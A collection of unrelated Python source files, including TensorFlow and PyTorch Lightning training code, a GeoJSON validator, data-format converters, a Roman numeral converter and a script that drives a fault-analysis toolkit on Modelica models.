self.test_loss = tf.keras.metrics.Mean(name='test_loss')
def get_optimizer(self,opt="adam"):
lr_schedule = tf.keras.optimizers.schedules.InverseTimeDecay(0.1,decay_steps=10000,decay_rate=1,staircase=False)
if opt == 'adam':
return tf.keras.optimizers.Adam(0.001)
elif opt == 'SGD':
return tf.keras.optimizers.SGD(lr_schedule)
else:
raise "This optimizer does not exist"
def get_loss(self,loss='MSE'):
if loss == 'MSE':
return tf.keras.losses.MSE
if loss == 'MAE':
return tf.keras.losses.MAE
else:
raise "error"
def predict(self,features):
return self.model.predict(features)
@tf.function
def train_step(self,features,values):
with tf.GradientTape() as tape:
predictions = self.model(features,training = True)
loss = self.loss(values,predictions)
gradients = tape.gradient(loss,self.model.trainable_variables)
self.optimizer.apply_gradients(zip(gradients,self.model.trainable_variables))
self.train_loss(loss)
@tf.function
def test_step(self,features,values):
predictions = self.model(features,training=False)
loss = self.loss(values,predictions)
self.test_loss(loss)
def train(self):
for epoch in range(100):
self.train_loss.reset_states()
self.test_loss.reset_states()
for features,values in train_ds:
self.train_step(features,values)
for features,values in test_ds:
self.test_step(features,values)
print(
f'Epoch {epoch + 1}, '
f'Loss: {self.train_loss.result()}, '
f'Test Loss: {self.test_loss.result()}, '
)
# Now we reset the random seeds for reproducibility and start the training!
os.environ['PYTHONHASHSEED']=str(1)
tf.random.set_seed(1)
np.random.seed(1)
trainer = Trainer()
trainer.train()
# Let's see the summary of the trained model
trainer.model.summary()
# Now we test the model on the test set
predictions = np.exp(np.reshape(trainer.model.predict(np.array(test_features)),(np.shape(test_features)[0],)))
mse = (np.square(predictions - test_labels)).mean()
percentage = np.mean(np.abs(predictions - test_labels)/(test_labels))
print("mean squared error is {} and the percentage is {}".format(mse,percentage))
# Our deep neural network model achieved a mean squared error of 226.68 (15.05 RMSE) and a percentage error of 9.35%.
plt.plot(predictions)
plt.plot(np.array(test_labels))
plt.legend(labels = ["predictions","labels"])
plt.show() | python |
# Class 20 - 05-12-2019
# Surface-level data analysis
# Tip: For this form you will need to use a new string method.
# You already know .strip(), which removes the trailing \n special characters
# from the string, and .split(''), which breaks the string into a list according
# to the characters inside the quotes.
# The new method for this exercise is .replace('{old}','{new}') - The old one
# is a character you want to replace and the new one is the character you want to insert.
# Example in the Python shell:
# >>> 'agua verde mar'.replace('a','A')
# 'AguA verde mAr'
# >>> 'agua verde mar'.replace('a','')
# 'gu verde mr'
# As we can see, in the first example the character "a" was replaced by "A"
# and in the second example the "a" was removed from the string.
# Exercise!
# Do this using functions
# AMBEV's Marketing department created a market survey about preferences.
# https://forms.gle/PLuAZXpmpBvE1vkX7
# To analyze the data from this survey, HBSIS was asked to perform
# the analysis of this data!
# The file name is Formulário.csv
# From this file the following answers must be produced:
# How many people like beer?
# A:
# How many people like soda?
# A:
# How many people like both beer and soda?
# A:
# How many people took part in this survey?
# A:
# Which beer brand do the participants prefer?
# A:
# How many female respondents like crackers?
# A:
# How many women like beer?
# A:
# How many underage respondents like beer?
# A:
# How many women like to drink both beer and soda?
# A:
| python |
# pylint: disable=invalid-name
"""Utility function to get information from graph."""
from __future__ import absolute_import as _abs
import tvm
from . import graph_attr
def infer_shape(graph, **shape):
"""Infer the shape given the shape of inputs.
Parameters
----------
graph : Graph
The graph to perform shape inference from
shape : dict of str to tuple
The specific input shape.
Returns
-------
in_shape : list of tuple
Shape of inputs
out_shape: list of tuple
Shape of outputs
"""
graph = graph_attr.set_shape_inputs(graph, shape)
graph = graph.apply("InferShape")
shape = graph.json_attr("shape")
index = graph.index
input_shape = [shape[index.entry_id(x)] for x in index.input_names]
output_shape = [shape[index.entry_id(x)] for x in index.output_entries]
return input_shape, output_shape
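# Usage sketch (the symbol construction below is an assumption, shown only for illustration):
#   import nnvm
#   import nnvm.symbol as sym
#   x = sym.Variable("x")
#   y = sym.dense(x, units=10)
#   in_shapes, out_shapes = infer_shape(nnvm.graph.create(y), x=(4, 20))
#   # out_shapes -> [[4, 10]]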
def infer_dtype(graph, **dtype):
"""Infer the type given the typeS of inputs.
Parameters
----------
graph : Graph
The graph to perform type inference from
dtype : dict of str to dtype
The specific input data type.
Returns
-------
in_dtype : list of tuple
Dtype of inputs
out_dtype: list of tuple
Dtype of outputs
"""
graph = graph_attr.set_dtype_inputs(graph, dtype)
graph = graph.apply("InferType")
dtype = graph.json_attr("dtype")
index = graph.index
input_dtype = [graph_attr.TCODE_TO_DTYPE[dtype[index.entry_id(x)]]
for x in index.input_names]
output_dtype = [graph_attr.TCODE_TO_DTYPE[dtype[index.entry_id(x)]]
for x in index.output_entries]
return input_dtype, output_dtype
_deep_compare = tvm.get_global_func("nnvm.graph.DeepCompare")
def check_graph_equal(grapha, graphb, compare_variable_attrs=False):
"""Check if two graphs have equal structure.
Parameters
----------
grapha : Graph
The first graph
graphb : Graph
The second graph
compare_variable_attrs : bool, optional
Whether we want to compare attributes(names) on variables.
Usually it is safe to skip it unless we want input name
to exactly match
Raises
------
ValueError
ValueError is raised with error message when graph not equal
"""
err = _deep_compare(grapha, graphb, compare_variable_attrs)
if err:
raise ValueError("Graph compare error: " + err)
| python |
BLACK = '\033[30m'
RED = '\033[31m'
GREEN = '\033[32m'
YELLOW = '\033[33m'
BLUE = '\033[34m'
MAGENTA = '\033[35m'
CYAN = '\033[36m'
GRAY = '\033[90m'
WHITE = '\033[37m'
UNDERLINE = '\033[4m'
END = '\033[0m' | python |
# -*- coding: utf-8 -*-
"""
.. module:: Backend.utils
:platform: Unix, Windows
.. moduleauthor:: Aki Mäkinen <[email protected]>
"""
__author__ = 'Aki Mäkinen'
s_codes = {
"OK": 200,
"BAD": 400,
"UNAUTH": 401,
"FORBIDDEN": 403,
"NOTFOUND": 404,
"METHODNOTALLOWED": 405,
"TEAPOT": 418,
"INTERNALERROR": 500
}
_geojson_feature_fields = {
"type": {
"_self_": (unicode(), True),
"_values_": ["Feature"]
},
"geometry": {
"_self_": (dict(), True),
"type": {
"_self_": (unicode(), True),
"_values_": ["Point"]
},
"coordinates": {
"_self_": (list(), True),
"_elements_": float(),
"_elementcount_": 2
}
},
"properties": {
"_self_": (dict(), True),
"metadata": {
"_self_": (dict(), False),
"status": (unicode(), True),
"info": (unicode(), True)
}
},
"id": (unicode(), True)
}
_geojson_featurecollection_fields = {
"type": (unicode(), True), # Field key hard coded in validation
"totalFeatures": (int(), False),
"features": {
"_self_": (list(), True),
"_elements_": _geojson_feature_fields
} # Field key hard coded in validation
}
def geo_json_scheme_validation(jsondict):
"""
A simple GeoJSON validator.
Uses the GeoJSON definitions described in LBD JSON Formats document.
JSON format is described as python dictionary, where the key specifies the name of a JSON field and
value describes if the field/value is required and what is the type of the value. There are some special
key values: _self_ (if the value is list or embedded document), _elements_ (if the value is a list, this describes
the element type) and _elementcount_ (restricts how many elements list can have).
.. note::
        This function is an if-else hell... and the JSON format document is outdated.
:param jsondict: GeoJSON formatted Python dictionary containing either GeoJSON Feature or FeatureCollection.
:return Boolean: True or False depending on the result of the validation
"""
if not isinstance(jsondict, dict):
return False
if "type" in jsondict:
# Check that the given itemdict follows the given format.
# Stops at the first error returning False
def check_items(itemdict, itemformat):
for key, value in itemformat.iteritems():
if isinstance(value, tuple):
if value[1] == True and key not in itemdict:
return False
elif key in itemdict:
if not isinstance(itemdict[key], type(value[0])):
return False
elif key.lower() in [k.lower() for k in itemdict]:
return False
else:
pass
elif isinstance(value, dict):
if value["_self_"][1] == True and key not in itemdict:
return False
elif key in itemdict:
if isinstance(value["_self_"][0], list):
if "_elementcount_" in value:
if not len(itemdict[key]) == value["_elementcount_"]:
return False
if isinstance(value["_elements_"], dict):
itemlist = itemdict[key]
newitemformat = dict(value["_elements_"])
for item in itemlist:
result = check_items(item, newitemformat)
if not result:
return False
else:
for listitem in itemdict[key]:
if not isinstance(listitem, type(value["_elements_"])):
return False
elif isinstance(value["_self_"][0], dict):
newitemdict = itemdict[key]
newitemformat = dict(value)
del newitemformat["_self_"]
result = check_items(newitemdict, newitemformat)
if not result:
return False
else:
if isinstance(itemdict[key], type(value["_self_"][0])):
if "_values_" in value:
try:
if itemdict[key].lower() not in [v.lower() for v in value["_values_"]]:
return False
except AttributeError:
if itemdict[key] not in value["_values_"]:
return False
else:
return False
elif key in [k.lower() for k in itemdict]:
return False
else:
pass
else:
return False
return True
if jsondict["type"].lower() == "featurecollection":
result = check_items(jsondict, _geojson_featurecollection_fields)
elif jsondict["type"].lower() == "feature":
result = check_items(jsondict, _geojson_feature_fields)
else:
return False
else:
result = False
return result
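# A minimal Feature that passes the schema above (illustrative values only; note
# that under Python 2 the string values must be unicode, hence the u'' literals,
# and "coordinates" must contain exactly two floats):
#
#   geo_json_scheme_validation({
#       u"type": u"Feature",
#       u"geometry": {u"type": u"Point", u"coordinates": [24.94, 60.17]},
#       u"properties": {},
#       u"id": u"example-1",
#   })  # -> True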
def flattener(dicti, parent):
"""
Dictionary flattener
    Flattens a nested dictionary, yielding dot-separated key paths.
    Creates one flat iterable of keys.
:param dicti: Dictionary to be flattened
:param parent: Parent element of the dictionary
"""
for k, v in dicti.iteritems():
if isinstance(v, dict):
if parent is None:
father = k
else:
father = parent + "." + k
for item in flattener(v, father):
yield item
else:
if parent is not None:
yield parent + "." + k
else:
yield k | python |
import logging
from common.DataSyncer import DataSyncer
from common.logger import initialize_logger
from models.User import User
logger = logging.getLogger(__name__)
initialize_logger(logger)
class UserPartialSyncer:
"""
Sync only latest users info from API to db
"""
def __init__(self):
self.dataSyncer = DataSyncer('https://api.bgm.tv/user/', User, 435000, 9)
def calculate_incremental_scraping_range(self):
# get current user with maximum id in database
current_max_id_user = self.dataSyncer.databaseExecutor.session \
.query(User) \
.order_by(User.id.desc()) \
.first()
current_user_max_id = current_max_id_user.id \
if current_max_id_user is not None else 0
return max(1, current_user_max_id), self.dataSyncer.requestHandler.max_id
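    # Illustrative example: if the largest user id stored locally is 420000 and the
    # API reports 435000, this returns (420000, 435000); with an empty table the
    # lower bound falls back to 1.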
def run(self):
max_db_id, max_api_id = self.calculate_incremental_scraping_range()
if max_db_id < max_api_id:
logger.info(
'Current max user id:%s in database is smaller than max id:%s in API, starting syncing data from'
' %s to %s', max_db_id, max_api_id, max_db_id, max_api_id)
self.dataSyncer.start_scraper(max_db_id, max_api_id + 1)
else:
            logger.info(
                'Nothing to sync as there\'s no new user. Current max id in API: %s, max id in database: %s',
                max_api_id, max_db_id)
if __name__ == "__main__":
userPartialSyncer = UserPartialSyncer()
userPartialSyncer.run()
| python |
import sys
import ui
if __name__ == "__main__":
app = ui.QtWidgets.QApplication(sys.argv)
MainWindow = ui.QtWidgets.QMainWindow()
ui = ui.Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_()) | python |
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
dataset = pd.read_csv("student_scores.csv")
# dimensions of the dataset
dataShape = dataset.shape
print(dataShape)
print(dataset.head(7)) # shows the first rows of the dataset; the default is 5.
print(dataset.tail(7)) # shows the last rows of the dataset; the default is 5.
# describe() can be used for a quick summary of the dataset.
print(dataset.describe())
print(dataset.columns) # returns the column names of the dataset.
X = dataset.iloc[:, :-1].values # Hours values
y = dataset.iloc[:, 1].values # Scores values
print(X)
print(y)
# Splits the dataset into training and test sets
# test_size=0.2 => 80% of the dataset is used for training, 20% for testing
# random_state => prevents the function from shuffling the data differently on each run,
# so training is always done with the same ordering.
from sklearn.model_selection import train_test_split
Xtrain, Xtest, ytrain, ytest = train_test_split(X, y, test_size=0.2, random_state=0)
# Adding the regression model
from sklearn.linear_model import LinearRegression
reg = LinearRegression() # create the regression object
reg.fit(Xtrain,ytrain) # the prepared data is passed to the model and training starts.
print(reg.intercept_) # The result should be approximately 2.01816004143.
# the change in y when x increases by one unit
print(reg.coef_) # for this example, studying one extra hour raises the score by this amount.
### Making Predictions
yPred = reg.predict(Xtest) ## predictions made from the Xtest values
print(yPred)
# the predictions are put into a DataFrame so they can be compared with the actual values.
df = pd.DataFrame({"Actual Value": ytest, "Predicted Value": yPred})
print(df)
## Performance Evaluation
from sklearn import metrics
# Score according to the Mean Absolute Error (MAE) metric.
# The absolute error is the difference between the predicted and actual values:
# the absolute value of the difference between the actual value and the prediction.
maeScore = metrics.mean_absolute_error(ytest, yPred)
print("Mean Absolute Error = " + str(maeScore))
# Result according to the Mean Squared Error (MSE) metric.
# MSE is the arithmetic mean of the squared differences between the actual
# value and the prediction for each sample.
mseScore = metrics.mean_squared_error(ytest, yPred)
print("Mean Squared Error = " + str(mseScore))
# Result according to the Root Mean Squared Error (RMSE) metric
rmseScore = np.sqrt(metrics.mean_squared_error(ytest, yPred))
print("RMSE = "+ str(rmseScore))
# Data visualization
dataset.plot(x="Hours", y="Scores", style="go")
random_x = [1.1, 5.01, 9.2]
plt.plot(random_x,
         reg.intercept_ + reg.coef_ * random_x,
         color='red',
         label='regression line')
plt.title("Percentage Scores by Study Hours")
plt.xlabel("Study Hours")
plt.ylabel("Percentage Scores")
plt.savefig("Grafik.jpg")
plt.show()
## Predictions on data outside the dataset
testVeri = np.array([0.5, 1.0, 4.2, 6.7, 10.0]).reshape(-1,1)
pred = reg.predict(testVeri)
for i in range(len(testVeri)):
print(str(testVeri[i]) + "=>" + str(pred[i]) ) | python |
import os, sys
variables_size = 3
dataset_name = "Epilepsy"
class_dictionary = {}
class_count = 1
dirname = os.path.abspath(os.path.dirname(sys.argv[0]))
train_test_str = ["_TRAIN","_TEST"]
for i in range(0,2):
arff_data_flag = 0
series_count = 1
file_location = dirname + "/" + dataset_name + train_test_str[i] + ".arff"
with open(file_location) as fin:
newfile_name = dataset_name + train_test_str[i] + "_FORMATED"
with open(newfile_name, "w") as newfile:
for line in fin:
if arff_data_flag == 0:
if line == "@data\n": #check for start of dataset values
arff_data_flag = 1
continue
line = line.split(",")
attribute_iterator = 0
class_value = None
ts_helper = []
for j in range(0,variables_size):
ts_helper.append([])
for j in range(0,len(line)):
if "\\n" in line[j]:
splitted_lines = line[j].split("\\n")
ts_helper[attribute_iterator].append(float(splitted_lines[0]))
attribute_iterator = attribute_iterator + 1
ts_helper[attribute_iterator].append(float(splitted_lines[1]))
elif j == (len(line)-1):
if line[j] in class_dictionary:
class_value = class_dictionary[line[j]]
else:
class_dictionary[line[j]] = class_count
class_value = class_count
class_count = class_count + 1
elif "'" in line[j]:
formated_value = line[j].replace("'","")
ts_helper[attribute_iterator].append(float(formated_value))
elif '"' in line[j]:
formated_value = line[j].replace('"',"")
ts_helper[attribute_iterator].append(float(formated_value))
else:
ts_helper[attribute_iterator].append(float(line[j]))
for j in range(0,len(ts_helper[0])):
line_to_write = ""
line_to_write += str(series_count) + " " + str(j+1) + " " + str(class_value)
for u in range(0,variables_size):
line_to_write += " " + str(ts_helper[u][j])
line_to_write += "\n"
newfile.write(line_to_write)
series_count = series_count + 1
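# Each line written above has the form (values below are illustrative only):
#   <series_id> <time_index> <class_label> <v1> <v2> <v3>
#   e.g. "1 1 2 -0.153 0.482 9.807"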
| python |
from .AlgerianMobilePhoneNumber import AlgerianMobilePhoneNumber | python |
from automl_infrastructure.experiment.observations import SimpleObservation
import numpy as np
class Std(SimpleObservation):
"""
Implementation of standard deviation scores aggregation.
"""
def __init__(self, metric):
super().__init__(metric)
def agg_func(self, values):
return np.std(values)
class Avg(SimpleObservation):
"""
Implementation of mean scores aggregation.
"""
def __init__(self, metric):
super().__init__(metric)
def agg_func(self, values):
return np.mean(values)
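# Illustrative behaviour (assuming `metric` is any metric object accepted by
# SimpleObservation):
#   Avg(metric).agg_func([1.0, 2.0, 3.0])  -> 2.0
#   Std(metric).agg_func([1.0, 2.0, 3.0])  -> ~0.816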
| python |
import torch
import torchvision.transforms as T
from pytorch_grad_cam import GradCAMPlusPlus
from pytorch_lightning import LightningModule
from pawpularity.augmentations import mixup
from . import efficientnet, levit_transformer, swin_transformers, vision_transformers, learnable_resizer
class Model(LightningModule):
supported_models = {
'EfficientNetV2Large': efficientnet.__dict__['EfficientNetV2Large'],
'EfficientNetV2Medium': efficientnet.__dict__['EfficientNetV2Medium'],
'EfficientNetV2Small': efficientnet.__dict__['EfficientNetV2Small'],
'EfficientNetB0': efficientnet.__dict__['EfficientNetB0'],
'EfficientNetB1': efficientnet.__dict__['EfficientNetB1'],
'EfficientNetB2': efficientnet.__dict__['EfficientNetB2'],
'EfficientNetB3': efficientnet.__dict__['EfficientNetB3'],
'EfficientNetB4': efficientnet.__dict__['EfficientNetB4'],
'EfficientNetB5': efficientnet.__dict__['EfficientNetB5'],
'Levit': levit_transformer.__dict__['Levit'],
'SwinLarge': swin_transformers.__dict__['SwinLarge'],
'SwinLargev2': swin_transformers.__dict__['SwinLargev2'],
'SwinSmall': swin_transformers.__dict__['SwinSmall'],
'SwinTiny': swin_transformers.__dict__['SwinTiny'],
'ViTTiny': vision_transformers.__dict__['ViTTiny'],
'ViTTinyv2': vision_transformers.__dict__['ViTTinyv2'],
'ViTSmall': vision_transformers.__dict__['ViTSmall'],
'ViTSmallv2': vision_transformers.__dict__['ViTSmallv2'],
'ViTLarge': vision_transformers.__dict__['ViTLarge'],
'ViTLargev2': vision_transformers.__dict__['ViTLargev2'],
'ViTHybridTiny': vision_transformers.__dict__['ViTHybridTiny'],
'ViTHybridTinyv2': vision_transformers.__dict__['ViTHybridTinyv2'],
'ViTHybridSmall': vision_transformers.__dict__['ViTHybridSmall'],
'ViTHybridSmallv2': vision_transformers.__dict__['ViTHybridSmallv2'],
'ViTHybridLarge': vision_transformers.__dict__['ViTHybridLarge'],
'ViTHybridLargev2': vision_transformers.__dict__['ViTHybridLargev2'],
}
supported_loss = {
'BCEWithLogitsLoss': torch.nn.BCEWithLogitsLoss
}
supported_optimizers = {
'Adam': torch.optim.Adam,
'AdamW': torch.optim.AdamW
}
supported_schedulers = {
'CosineAnnealingWarmRestarts': torch.optim.lr_scheduler.CosineAnnealingWarmRestarts
}
def __init__(self,
cfg):
super().__init__()
self.cfg = cfg
self._build_model()
self._build_criterion()
self.save_hyperparameters(self.cfg.asdict)
def _build_model(self):
if self.cfg.model_name not in self.supported_models:
raise ValueError(
f"{self.cfg.model_name} not supported, check your configuration")
self.model = self.supported_models[self.cfg.model_name](self.cfg)
def _build_criterion(self):
if self.cfg.loss not in self.supported_loss:
raise ValueError(
f"{self.cfg.loss} not supported, check your configuration")
self.criterion = self.supported_loss[self.cfg.loss]()
def _build_optimizer(self):
if self.cfg.optimizer['name'] not in self.supported_optimizers:
raise ValueError(
f"{self.cfg.optimizer} not supported, check your configuration")
self.optimizer = self.supported_optimizers[self.cfg.optimizer['name']](
self.parameters(), **self.cfg.optimizer['params'])
def _build_scheduler(self):
if self.cfg.scheduler['name'] not in self.supported_schedulers:
raise ValueError(
f"{self.cfg.optimizer} not supported, check your configuration")
self.scheduler = self.supported_schedulers[self.cfg.scheduler['name']](
self.optimizer, **self.cfg.scheduler['params'])
def forward(self, x):
out = self.model(x)
return out
def training_step(self, batch, batch_idx):
loss, pred, labels = self._share_step(batch, 'train')
return {'loss': loss, 'pred': pred, 'labels': labels}
def validation_step(self, batch, batch_idx):
loss, pred, labels = self._share_step(batch, 'val')
return {'loss': loss, 'pred': pred, 'labels': labels}
def predict_step(self, batch, batch_idx, dataloader_idx=0):
images, _ = batch
logits, embeddings = self.model(images, True)
pred = logits.squeeze(1).sigmoid().detach().cpu().numpy() * 100.
embeddings = embeddings.detach().cpu().numpy()
return {'pred': pred, 'embeddings': embeddings}
def _share_step(self, batch, mode):
images, labels = batch
labels = labels.float() / 100.0
if torch.rand(1)[0] < 0.5 and mode == 'train':
mix_images, target_a, target_b, lam = mixup(
images, labels, alpha=0.5)
logits = self.forward(mix_images).squeeze(1)
loss = self.criterion(logits, target_a) * lam + \
(1 - lam) * self.criterion(logits, target_b)
else:
logits = self.forward(images).squeeze(1)
loss = self.criterion(logits, labels)
pred = logits.sigmoid().detach().cpu() * 100.
labels = labels.detach().cpu() * 100.
return loss, pred, labels
def training_epoch_end(self, outputs):
self._share_epoch_end(outputs, 'train')
def validation_epoch_end(self, outputs):
self._share_epoch_end(outputs, 'val')
def _share_epoch_end(self, outputs, mode):
preds = []
labels = []
for out in outputs:
pred, label = out['pred'], out['labels']
preds.append(pred)
labels.append(label)
preds = torch.cat(preds)
labels = torch.cat(labels)
metrics = torch.sqrt(((labels - preds) ** 2).mean())
self.log(f'{mode}_loss', metrics)
def check_gradcam(self, dataloader, target_layer, target_category, reshape_transform=None):
inv_normalize = T.Normalize(mean=[-m/s for m, s in zip(self.cfg.image_mean, self.cfg.image_std)],
std=[1/s for s in self.cfg.image_std])
cam = GradCAMPlusPlus(
model=self,
target_layer=target_layer,
use_cuda=self.cfg.trainer['gpus'],
reshape_transform=reshape_transform)
        org_images, labels = next(iter(dataloader))
cam.batch_size = len(org_images)
images = org_images.to(self.device)
logits = self.forward(images).squeeze(1)
pred = logits.sigmoid().detach().cpu().numpy() * 100
labels = labels.cpu().numpy()
grayscale_cam = cam(input_tensor=images,
target_category=target_category, eigen_smooth=True)
org_images = inv_normalize(images)
org_images = org_images.detach().cpu().numpy().transpose(0, 2, 3, 1)
return org_images, grayscale_cam, pred, labels
def configure_optimizers(self):
self._build_optimizer()
self._build_scheduler()
return {"optimizer": self.optimizer, "lr_scheduler": self.scheduler}
class ResizerModel(LightningModule):
supported_models = {
'Resizer': learnable_resizer.__dict__['Resizer']
}
supported_loss = {
'CrossEntropyLoss': torch.nn.CrossEntropyLoss,
'MSE': torch.nn.MSELoss
}
supported_optimizers = {
'Adam': torch.optim.Adam,
'AdamW': torch.optim.AdamW
}
supported_schedulers = {
'CosineAnnealingWarmRestarts': torch.optim.lr_scheduler.CosineAnnealingWarmRestarts
}
def __init__(self,
cfg):
super().__init__()
self.cfg = cfg
self._build_model()
self._build_criterion()
def _build_model(self):
if self.cfg.model_name not in self.supported_models:
raise ValueError(
f"{self.cfg.model_name} not supported, check your configuration")
self.model = self.supported_models[self.cfg.model_name](self.cfg)
def _build_criterion(self):
if self.cfg.loss not in self.supported_loss:
raise ValueError(
f"{self.cfg.loss} not supported, check your configuration")
self.criterion = self.supported_loss[self.cfg.loss]()
def _build_optimizer(self):
if self.cfg.optimizer['name'] not in self.supported_optimizers:
raise ValueError(
f"{self.cfg.optimizer} not supported, check your configuration")
self.optimizer = self.supported_optimizers[self.cfg.optimizer['name']](
self.parameters(), **self.cfg.optimizer['params'])
def _build_scheduler(self):
if self.cfg.scheduler['name'] not in self.supported_schedulers:
raise ValueError(
f"{self.cfg.optimizer} not supported, check your configuration")
self.scheduler = self.supported_schedulers[self.cfg.scheduler['name']](
self.optimizer, **self.cfg.scheduler['params'])
def forward(self, x):
out = self.model(x)
return out
def training_step(self, batch, batch_idx):
loss, pred, labels = self._share_step(batch, 'train')
return {'loss': loss, 'pred': pred, 'labels': labels}
def validation_step(self, batch, batch_idx):
loss, pred, labels = self._share_step(batch, 'val')
return {'loss': loss, 'pred': pred, 'labels': labels}
def _share_step(self, batch, mode):
x, y = batch
y_hat = self.model(x)
loss = self.criterion(y_hat, y)
y_hat = y_hat.detach().cpu()
y = y.detach().cpu()
return loss, y_hat, y
def _share_epoch_end(self, outputs, mode):
preds = []
labels = []
for out in outputs:
pred, label = out['pred'], out['labels']
preds.append(pred)
labels.append(label)
preds = torch.cat(preds)
labels = torch.cat(labels)
metrics = ((labels - preds) ** 2).mean()
self.log(f'{mode}_loss', metrics)
def training_epoch_end(self, training_step_outputs):
self._share_epoch_end(training_step_outputs, 'train')
def validation_epoch_end(self, validation_step_outputs):
self._share_epoch_end(validation_step_outputs, 'val')
def configure_optimizers(self):
self._build_optimizer()
self._build_scheduler()
return {"optimizer": self.optimizer, "lr_scheduler": self.scheduler}
| python |
# Generated by Django 3.1.5 on 2021-04-29 10:53
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('webpage', '0014_auto_20210428_0912'),
]
operations = [
migrations.AddField(
model_name='notification',
name='read',
field=models.BooleanField(default=False),
),
]
| python |
from __future__ import print_function
# Time: O(n)
# Space: O(1)
#
# Given a roman numeral, convert it to an integer.
#
# Input is guaranteed to be within the xrange from 1 to 3999.
#
class Solution:
# @return an integer
def romanToInt(self, s):
numeral_map = {"I": 1, "V": 5, "X": 10, "L": 50, "C":100, "D": 500, "M": 1000}
decimal = 0
for i in xrange(len(s)):
if i > 0 and numeral_map[s[i]] > numeral_map[s[i - 1]]:
decimal += numeral_map[s[i]] - 2 * numeral_map[s[i - 1]]
else:
decimal += numeral_map[s[i]]
return decimal
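# Worked example for "XIV": X adds 10; I adds 1; V (5) is larger than the previous
# numeral I (1), so it contributes 5 - 2*1 = 3, giving 10 + 1 + 3 = 14.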
if __name__ == "__main__":
print(Solution().romanToInt("IIVX"))
print(Solution().romanToInt("MMMCMXCIX"))
| python |
from mat_mult.mcm import memoized_mcm
def test_memo(test_cases):
for test in test_cases:
dims = test['dims']
best_cost = memoized_mcm(dims=dims)[0]
assert best_cost == test['cost']
| python |
###########################################################################
#
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###########################################################################
import json
from django.core.management.base import BaseCommand, CommandError
from starthinker_ui.recipe.views import autoscale
from starthinker_ui.recipe.models import Recipe, utc_milliseconds, JOB_LOOKBACK_MS
class Command(BaseCommand):
help = 'Autoscale workers.'
def handle(self, *args, **kwargs):
print(json.dumps(json.loads(autoscale(None).content), indent=2))
for recipe in Recipe.objects.filter(active=True, job_utm__lt=utc_milliseconds()).exclude(job_utm=0):
print(recipe.id, recipe.name, recipe.get_days())
print('---')
for recipe in Recipe.objects.filter(active=True, worker_utm__gte=utc_milliseconds() - JOB_LOOKBACK_MS):
print(recipe.id, recipe.name, recipe.worker_uid)
| python |
import torch
from change_detection_pytorch.encoders import get_encoder
if __name__ == '__main__':
sample = torch.randn(1, 3, 256, 256)
model = get_encoder('mit-b0', img_size=256)
res = model(sample)
for x in res:
print(x.size())
| python |
# -*- Mode: Python -*-
#
# This file calls PARC_FAME_Toolkit and determine possible fault modes
# that exists in CyPhy Driveline Model.
import sys, os, traceback, json, shutil
from collections import OrderedDict
import fetch
script_dir = os.path.dirname(os.path.realpath(__file__))
output_dir = os.path.abspath(os.path.join(script_dir,"../"))
cyphy_model_dir = os.path.abspath(os.path.join(script_dir,"../CyPhy"))
# function to put the result into json format
def output(faultCount,output_dir):
# creating ordered dictionary to be outputted in testbench.json format
data = OrderedDict()
data["$id"] = "1"
data["Name"] = "FAME_Possible_Faults"
MetricDict = OrderedDict()
MetricDict["$id"] = "2"
    # setting an arbitrary number as the default requirement value
MetricDict["Requirement"] = "1000"
MetricDict["Name"] = "Possible_Faults"
MetricDict["Unit"] = "count"
MetricDict["Value"] = faultCount
data["Metric"] = [MetricDict]
with open(os.path.join(script_dir,'FAME_Possible_Faults.testbench.json'),'w') as outfile:
json.dump(data,outfile, indent=2,sort_keys=False)
# quick bug fix for space in modelica folder name
# this is stripping the version number from Modelica library (if version is separated by space).
def set_library_dir():
library_dir = os.path.join(script_dir,'../Libraries/')
if os.path.exists(library_dir):
for foldername in os.listdir(library_dir):
try:
                if len(foldername.split(" ")) > 1:
os.rename(os.path.join(library_dir,foldername),os.path.join(library_dir,foldername.split()[0]))
except WindowsError:
shutil.rmtree(os.path.join(library_dir,foldername.split()[0]))
os.rename(os.path.join(library_dir,foldername),os.path.join(library_dir,foldername.split()[0]))
else:
outfile = open("_FAILED.txt","w")
outfile.write("Missing Modelica Library which should be in ../Libraries\n")
outfile.close()
sys.exit()
return library_dir
def get_fame_toolbox_modelica_libraries():
flag = 1
# check if any critical library is missing
if (os.path.isdir(os.path.join(script_dir,"FAME")) and
os.path.isdir(os.path.join(script_dir,"MSL")) and
os.path.isdir(os.path.join(script_dir,"pre-faulted"))):
flag = 0
if flag == 1:
# going redownload whole set of key libraries
if os.path.exists(os.path.join(script_dir,"FAME")):
shutil.rmtree(os.path.join(script_dir,"FAME"))
if os.path.exists(os.path.join(script_dir,"MSL")):
shutil.rmtree(os.path.join(script_dir,"MSL"))
if os.path.exists(os.path.join(script_dir,"pre-faulted")):
shutil.rmtree(os.path.join(script_dir,"pre-faulted"))
fetch.fetch_and_unpack_zip_file("http://fame-deploy.parc.com/C2M2L_Decl/fault-enabled-libraries/FAME_Toolkit_Modelica_Files.zip", script_dir)
shutil.move(os.path.join(script_dir,"FAME_Toolkit_Modelica_Files","FAME"),
os.path.join(script_dir,"FAME"))
shutil.move(os.path.join(script_dir,"FAME_Toolkit_Modelica_Files","MSL"),
os.path.join(script_dir,"MSL"))
shutil.move(os.path.join(script_dir,"FAME_Toolkit_Modelica_Files","pre-faulted"),
os.path.join(script_dir,"pre-faulted"))
shutil.rmtree(os.path.join(script_dir,"FAME_Toolkit_Modelica_Files"))
def get_testbench_name():
model_raw_data = open(os.path.join(cyphy_model_dir,"model_config.json"))
model_json = json.load(model_raw_data)
return model_json["model_name"]
try:
import PARC_FAME_Toolkit
library_dir = set_library_dir()
# finding testbench name from json file that CyPhy created.
testbench_name = get_testbench_name()
# finding all the necessary model library to run testbench
"""
# This approach failed because Postprocessing folder, which is not Modelica package
# was in CyPhy folder.
model_libraries = [cyphy_model_dir]
for directory in os.listdir(cyphy_model_dir):
if os.path.isdir(os.path.join(cyphy_model_dir,directory)):
model_libraries.append(os.path.abspath(os.path.join(cyphy_model_dir,directory)))
"""
model_libraries = [os.path.abspath(os.path.join(script_dir,"../CyPhy/"))]
